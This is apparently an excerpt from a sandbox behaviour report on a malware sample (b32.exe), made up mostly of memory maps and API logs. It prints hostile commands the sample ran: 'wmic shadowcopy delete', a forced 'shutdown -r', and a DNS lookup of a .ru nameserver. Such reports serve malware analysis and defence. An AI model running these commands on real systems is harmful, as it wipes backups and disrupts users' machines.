private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x690
10 18
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:21:34 (UTC) True 1
Fn
System Get Time type = Ticks, time = 156843 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x4f0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = XDuwTfOno True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 94.249.60.127, 89.203.10.56, 189.75.183.21 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 570 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #12: wmic.exe
21 0
Information Value
ID #12
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:42
OS Process Information
Information Value
PID 0x110
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 4E8
0x 324
0x 344
0x 15C
0x 4F8
0x 4B8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable, Writable True False False -
wmic.exe.mui 0x000c0000 0x000cffff Memory Mapped File Readable, Writable False False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
msxml3r.dll 0x00210000 0x00210fff Memory Mapped File Readable False False False -
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0027ffff Private Memory - True False False -
private_0x0000000000280000 0x00280000 0x002fffff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x0035ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000300000 0x00300000 0x00301fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00310000 0x00310fff Memory Mapped File Readable False False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0035ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000360000 0x00360000 0x00361fff Pagefile Backed Memory Readable True False False -
index.dat 0x00370000 0x0037ffff Memory Mapped File Readable, Writable True False False -
index.dat 0x00380000 0x00387fff Memory Mapped File Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x0042ffff Private Memory Readable, Writable True False False -
index.dat 0x003d0000 0x003dffff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000003f0000 0x003f0000 0x0042ffff Private Memory Readable, Writable True False False -
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006c0000 0x006c0000 0x00840fff Pagefile Backed Memory Readable True False False -
private_0x0000000000850000 0x00850000 0x0099ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x00850000 0x0090ffff Memory Mapped File Readable, Writable False False False -
rsaenh.dll 0x00910000 0x0094bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000910000 0x00910000 0x0091cfff Pagefile Backed Memory Readable, Writable True False False -
wmiutils.dll.mui 0x00910000 0x00914fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000960000 0x00960000 0x0099ffff Private Memory Readable, Writable True False False -
private_0x00000000009a0000 0x009a0000 0x00adffff Private Memory Readable, Writable True False False -
private_0x00000000009a0000 0x009a0000 0x00a9ffff Private Memory Readable, Writable True False False -
private_0x0000000000aa0000 0x00aa0000 0x00adffff Private Memory Readable, Writable True False False -
private_0x0000000000ae0000 0x00ae0000 0x00b1ffff Private Memory Readable, Writable True False False -
private_0x0000000000b20000 0x00b20000 0x00b5ffff Private Memory Readable, Writable True False False -
wmic.exe 0x00b60000 0x00bc2fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000bd0000 0x00bd0000 0x01fcffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01fd0000 0x0229efff Memory Mapped File Readable False False False -
private_0x00000000022a0000 0x022a0000 0x024cffff Private Memory Readable, Writable True False False -
private_0x00000000022a0000 0x022a0000 0x0242ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000022a0000 0x022a0000 0x0237efff Pagefile Backed Memory Readable True False False -
private_0x0000000002380000 0x02380000 0x023bffff Private Memory Readable, Writable True False False -
private_0x00000000023f0000 0x023f0000 0x0242ffff Private Memory Readable, Writable True False False -
private_0x0000000002490000 0x02490000 0x024cffff Private Memory Readable, Writable True False False -
private_0x00000000024d0000 0x024d0000 0x028cffff Private Memory Readable, Writable True False False -
private_0x00000000028d0000 0x028d0000 0x02adffff Private Memory Readable, Writable True False False -
private_0x00000000028d0000 0x028d0000 0x0290ffff Private Memory Readable, Writable True False False -
private_0x0000000002970000 0x02970000 0x029affff Private Memory Readable, Writable True False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable True False False -
private_0x0000000002a10000 0x02a10000 0x02a4ffff Private Memory Readable, Writable True False False -
private_0x0000000002aa0000 0x02aa0000 0x02adffff Private Memory Readable, Writable True False False -
private_0x0000000002c20000 0x02c20000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002e10000 0x02e10000 0x02e1ffff Private Memory Readable, Writable True False False -
fastprox.dll 0x74ca0000 0x74d35fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x75440000 0x75456fff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x75480000 0x75497fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x754a0000 0x754aefff Memory Mapped File Readable, Writable, Executable False False False -
msvcr90.dll 0x754b0000 0x75552fff Memory Mapped File Readable, Writable, Executable False False False -
msoxmlmf.dll 0x75560000 0x7556cfff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x75570000 0x756a2fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x756b0000 0x7570bfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x75710000 0x75719fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x75720000 0x75727fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75730000 0x7573cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x75740000 0x75774fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x4e8
21 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:21:39 (UTC) True 1
Fn
System Get Time type = Ticks, time = 162662 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0xb60000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ffa84f True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-05-11 23:21:41 (Local Time) True 1
Fn
COM Create interface = EB87E1BC-3233-11D2-AEC9-00C04FB68820, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #14: cmd.exe
55 0
Information Value
ID #14
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:39
OS Process Information
Information Value
PID 0x7fc
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 73C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable True False False -
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x00757fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000760000 0x00760000 0x008e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x01ceffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001cf0000 0x01cf0000 0x02032fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02040000 0x0230efff Memory Mapped File Readable False False False -
cmd.exe 0x4a9a0000 0x4a9ebfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75430000 0x75436fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x73c
55 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 1602-08-19 10:55:38 (UTC) True 1
Fn
System Get Time type = Ticks, time = 165205 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a9a0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ffa84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76003b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fe4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75ffa79d True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\shutdown.exe, os_pid = 0x978, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #15: iexplore.exe
0 0
Information Value
ID #15
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
